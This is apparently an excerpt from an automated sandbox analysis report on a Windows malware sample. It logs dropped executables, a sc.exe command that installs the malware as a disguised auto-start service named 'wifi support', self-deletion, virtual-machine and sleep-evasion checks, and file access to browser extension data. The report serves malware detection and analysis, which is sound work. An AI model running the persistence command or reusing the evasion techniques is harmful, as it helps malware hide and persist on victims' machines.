                        Source: 27.0.A3D.exe.710000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'gJu1vuOsMV', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                        Source: 27.0.A3D.exe.710000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'gJu1vuOsMV', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                        Source: 27.0.A3D.exe.710000.3.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'D4GAbsxtFT', '.cctor', 'PYWC1Vd4G6nANFqse4', 'pJAxuRZqVEV0EDZmSp', 'Ql54pvmHfOuyRwtUOk', 'ISTaDZMy33ci7HGt5t'
                        Source: 39.0.A3D.exe.8f0000.13.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'D4GAbsxtFT', '.cctor', 'PYWC1Vd4G6nANFqse4', 'pJAxuRZqVEV0EDZmSp', 'Ql54pvmHfOuyRwtUOk', 'ISTaDZMy33ci7HGt5t'
                        Source: 39.0.A3D.exe.8f0000.13.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'gJu1vuOsMV', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                        Source: 39.0.A3D.exe.8f0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'gJu1vuOsMV', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                        Source: 39.0.A3D.exe.8f0000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'D4GAbsxtFT', '.cctor', 'PYWC1Vd4G6nANFqse4', 'pJAxuRZqVEV0EDZmSp', 'Ql54pvmHfOuyRwtUOk', 'ISTaDZMy33ci7HGt5t'
                        Source: C:\Users\user\AppData\Local\Temp\E936.exeFile created: C:\ProgramData\sqlite3.dllJump to dropped file
                        Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\jutawrsJump to dropped file
                        Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\E936.exeJump to dropped file
                        Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\lxijggxd\almerphs.exe (copy)Jump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\E936.exeFile created: C:\ProgramData\sqlite3.dllJump to dropped file
                        Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\B24B.exeJump to dropped file
                        Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\BC9C.exeJump to dropped file
                        Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\A3D.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\E936.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\sqlite3[1].dllJump to dropped file
                        Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\A847.exeJump to dropped file
                        Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\7D3D.exeJump to dropped file
                        Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\8992.exeJump to dropped file
                        Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\2AA1.exeJump to dropped file
                        Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\F3F5.exeJump to dropped file
                        Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\6BE6.exeJump to dropped file
                        Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\9904.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\F3F5.exeFile created: C:\Users\user\AppData\Local\Temp\almerphs.exeJump to dropped file
                        Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\jutawrsJump to dropped file
                        Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\lxijggxd\almerphs.exe (copy)Jump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\F3F5.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\SysWOW64\sc.exe" create lxijggxd binPath= "C:\Windows\SysWOW64\lxijggxd\almerphs.exe /d\"C:\Users\user\AppData\Local\Temp\F3F5.exe\"" type= own start= auto DisplayName= "wifi support
                        Source: C:\Users\user\AppData\Local\Temp\F3F5.exeCode function: 26_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,

                        Hooking and other Techniques for Hiding and Protection:

                        barindex
                        Deletes itself after installationShow sources
                        Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\4bffnma5mb.exeJump to behavior
                        Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                        Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\jutawrs:Zone.Identifier read attributes | delete
                        Source: C:\Users\user\AppData\Local\Temp\E936.exeCode function: 25_2_0040C2E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,
                        Source: C:\Users\user\AppData\Local\Temp\E936.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\E936.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\F3F5.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\F3F5.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\F3F5.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\F3F5.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\F3F5.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\F3F5.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\F3F5.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\F3F5.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\F3F5.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion:

                        barindex
                        Checks if the current machine is a virtual machine (disk enumeration)Show sources
                        Source: C:\Users\user\Desktop\4BfFNMA5mb.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                        Source: C:\Users\user\Desktop\4BfFNMA5mb.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                        Source: C:\Users\user\Desktop\4BfFNMA5mb.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                        Source: C:\Users\user\Desktop\4BfFNMA5mb.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                        Source: C:\Users\user\Desktop\4BfFNMA5mb.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                        Source: C:\Users\user\Desktop\4BfFNMA5mb.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                        Source: C:\Users\user\AppData\Local\Temp\2AA1.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                        Source: C:\Users\user\AppData\Local\Temp\2AA1.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                        Source: C:\Users\user\AppData\Local\Temp\2AA1.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                        Source: C:\Users\user\AppData\Local\Temp\2AA1.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                        Source: C:\Users\user\AppData\Local\Temp\2AA1.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                        Source: C:\Users\user\AppData\Local\Temp\2AA1.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                        Contains functionality to detect sleep reduction / modificationsShow sources
                        Source: C:\Users\user\AppData\Local\Temp\E936.exeCode function: 25_2_00406AA0
                        Source: C:\Windows\System32\svchost.exe TID: 2524Thread sleep time: -150000s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exe TID: 5272Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\SysWOW64\timeout.exe TID: 4776Thread sleep count: 41 > 30
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 570
                        Source: C:\Users\user\AppData\Local\Temp\E936.exeCode function: 25_2_00406AA0
                        Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Windows\SysWOW64\lxijggxd\almerphs.exe (copy)Jump to dropped file
                        Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\B24B.exeJump to dropped file
                        Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\BC9C.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\E936.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\sqlite3[1].dllJump to dropped file
                        Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\A847.exeJump to dropped file
                        Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\7D3D.exeJump to dropped file
                        Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\8992.exeJump to dropped file
                        Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\6BE6.exeJump to dropped file
                        Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9904.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\F3F5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\almerphs.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\E936.exeRegistry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeCode function: 27_2_0071ACA0 sldt word ptr [eax]
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\Temp\E936.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
                        Source: C:\Users\user\AppData\Local\Temp\E936.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
                        Source: C:\Users\user\AppData\Local\Temp\E936.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
                        Source: C:\Users\user\AppData\Local\Temp\E936.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
                        Source: C:\Users\user\AppData\Local\Temp\E936.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
                        Source: C:\Users\user\AppData\Local\Temp\E936.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
                        Source: A3D.exeBinary or memory string: c17ORNhV9oqkZjp0JiyH0sRMZDg/NasGdrO15iIQ+6sgnCme33DD61FTRys5Oxc17aBG682VBbi4mUmme154heXqxpTBBrgsLShzdSLVJkEik+SidQawAAZTw1dmBHgFSV
                        Source: explorer.exe, 0000000A.00000000.344261386.00000000086C9000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                        Source: explorer.exe, 0000000A.00000000.344397602.0000000008778000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
                        Source: explorer.exe, 0000000A.00000000.344261386.00000000086C9000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
                        Source: explorer.exe, 0000000A.00000000.304027545.00000000067C2000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                        Source: explorer.exe, 0000000A.00000000.304027545.00000000067C2000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
                        Source: svchost.exe, 00000000.00000002.551812059.00000296BCA02000.00000004.00000001.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
                        Source: svchost.exe, 00000011.00000002.416315645.0000023EEF282000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.416402872.0000023EEF2C3000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.416450939.0000023EEF2E9000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                        Source: explorer.exe, 0000000A.00000000.344261386.00000000086C9000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
                        Source: svchost.exe, 00000000.00000002.552984906.00000296BCA28000.00000004.00000001.sdmp, svchost.exe, 00000002.00000002.555473105.0000023727667000.00000004.00000001.sdmp, svchost.exe, 00000003.00000002.553034324.000002EA43029000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: C:\Users\user\Desktop\4BfFNMA5mb.exeProcess information queried: ProcessInformation
                        Source: C:\Users\user\AppData\Local\Temp\F3F5.exeCode function: 26_2_00401D96 CreateThread,GetVersionExA,GetSystemInfo,GetModuleHandleA,GetProcAddress,GetCurrentProcess,GetTickCount,
                        Source: C:\Users\user\AppData\Local\Temp\E936.exeCode function: 25_2_00405E40 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                        Source: C:\Users\user\AppData\Local\Temp\E936.exeCode function: 25_2_00401280 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                        Source: C:\Users\user\AppData\Local\Temp\E936.exeCode function: 25_2_00401090 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                        Source: C:\Users\user\AppData\Local\Temp\E936.exeCode function: 25_2_00409B40 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,
                        Source: C:\Users\user\AppData\Local\Temp\E936.exeCode function: 25_2_004087E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                        Source: C:\Users\user\AppData\Local\Temp\E936.exeCode function: 25_2_004096E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
